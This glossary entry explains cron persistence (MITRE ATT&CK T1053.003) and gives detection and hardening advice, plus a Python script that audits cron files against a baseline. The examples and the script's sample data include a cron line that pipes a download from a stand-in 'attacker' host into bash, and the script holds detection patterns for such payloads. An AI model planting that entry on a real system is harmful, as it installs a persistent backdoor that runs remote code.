Cron Persistence
What is Cron Persistence?
Linux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event.
Cron persistence (MITRE ATT&CK T1053.003) targets the Unix cron daemon and its variants (anacron, fcron, systemd-timer counterparts). Attackers add entries to /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/, or per-user crontabs (crontab -e). Common payloads are reverse-shell one-liners, downloader curl pipes, or scripts in /tmp. Because cron runs as root or the user it belongs to, the technique is reliable and trivial to deploy after initial access. Detection: file-integrity monitoring on cron directories, auditd watches on cron files, baseline of expected jobs, and EDR alerts on shells spawned by cron. Hardening: restrict crontab membership, mount /tmp noexec, and enable systemd-cron auditing where available.
● Examples
- 01
Adding * * * * * curl -s http://attacker/sh | bash to /etc/cron.d/update.
- 02
Dropping a script into /etc/cron.hourly/ to reconnect a reverse shell every hour.
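The detection controls above (a baseline of expected jobs plus alerting on cron entries that fetch or pipe into a shell or run from /tmp) can be implemented as a small audit. The following is an added example, not code from the original page: it parses both system-format cron files (with a user field) and per-user crontabs, reports any job not in an approved baseline, and tags the traits a reviewer would look at. The cron contents, baseline, and paths are constructed samples embedded inline rather than read from the live host.

```python
import re

# Constructed sample cron files (system files carry a user field, user crontabs do not)
SAMPLE_CRON_FILES = {
    "/etc/cron.d/update": "* * * * * root curl -s http://attacker/sh | bash\n",
    "/etc/cron.d/sysstat": "5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1\n",
    "/var/spool/cron/crontabs/alice": "SHELL=/bin/bash\n0 2 * * * /home/alice/backup.sh\n@reboot /tmp/.x/run.sh\n",
}
# Constructed baseline: commands previously reviewed and approved, keyed by file
BASELINE = {
    "/etc/cron.d/sysstat": {"command -v debian-sa1 > /dev/null && debian-sa1 1 1"},
    "/var/spool/cron/crontabs/alice": {"/home/alice/backup.sh"},
}
SYSTEM_FILE_PREFIXES = ("/etc/crontab", "/etc/cron.d/")
# Traits worth a closer look; each is a reason string attached to a finding
SUSPICIOUS = [
    (r"\|\s*(ba)?sh\b", "pipes fetched content into a shell"),
    (r"\b(curl|wget)\b", "fetches remote content"),
    (r"(^|\s)/(tmp|var/tmp|dev/shm)/", "runs a payload from a world-writable directory"),
    (r"\bbase64\b.*(-d|--decode)", "decodes an embedded base64 payload"),
]

def parse_entries(path, text):
    """Yield (schedule, user, command) per job line; skips comments and VAR=value lines."""
    system = path.startswith(SYSTEM_FILE_PREFIXES)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        nfields = 1 if line.startswith("@") else 5  # @reboot etc. vs five time fields
        parts = line.split(None, nfields + 1 if system else nfields)
        if len(parts) < (nfields + 2 if system else nfields + 1):
            continue  # malformed line, nothing runnable to report
        schedule = " ".join(parts[:nfields])
        user = parts[nfields] if system else path.rsplit("/", 1)[-1]
        yield schedule, user, parts[-1]

def audit(cron_files, baseline):
    """Return one finding per job absent from the baseline, with matched traits as reasons."""
    findings = []
    for path, text in cron_files.items():
        for schedule, user, command in parse_entries(path, text):
            if command in baseline.get(path, set()):
                continue  # approved job
            reasons = [why for pat, why in SUSPICIOUS if re.search(pat, command)]
            findings.append({"file": path, "user": user, "schedule": schedule,
                             "command": command, "reasons": reasons or ["not in baseline"]})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_CRON_FILES, BASELINE):
        print(f"{f['file']} [{f['user']}] {f['schedule']} {f['command']} -> {', '.join(f['reasons'])}")
```

On a real host the same functions would be fed the contents of /etc/crontab, /etc/cron.d/* and /var/spool/cron/* on a schedule, with the baseline refreshed whenever a job is legitimately approved.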
● Frequently asked questions
What is Cron Persistence?
Linux and Unix persistence technique that uses cron, anacron, or systemd timers to schedule attacker code so it re-executes at a chosen interval or system event. It belongs to the Attacks & Threats category of cybersecurity.
How do you defend against Cron Persistence?
Defences for Cron Persistence combine technical controls (file-integrity monitoring and auditd watches on cron directories, restricted crontab membership, a noexec /tmp) with operational practices (a baseline of expected jobs and EDR alerts on shells spawned by cron), as detailed in the full definition above.
What are other names for Cron Persistence?
Common alternative names include: Crontab persistence, Anacron persistence.
● Related terms
- LD_PRELOAD Hijacking (attacks № 610): Linux persistence and library-hijacking technique that uses the LD_PRELOAD environment variable or /etc/ld.so.preload to inject attacker code into dynamically linked processes.
- launchd Persistence (attacks № 608): macOS persistence technique that installs a LaunchDaemon or LaunchAgent property list so launchd executes attacker code at boot, login, or on a trigger.
- Scheduled Task Persistence (attacks № 975): Persistence and execution technique in which an attacker creates or modifies a Windows scheduled task to run their payload on a trigger such as logon, boot, or a timer.
- WMI Event Subscription Persistence (attacks № 1246): Persistence technique that registers a permanent WMI event filter and consumer so attacker code runs whenever a chosen system event occurs.
- Registry Run Key Persistence (attacks № 914): Classic Windows persistence technique that adds an entry under a Run or RunOnce registry key so a binary or script executes every time a user logs on.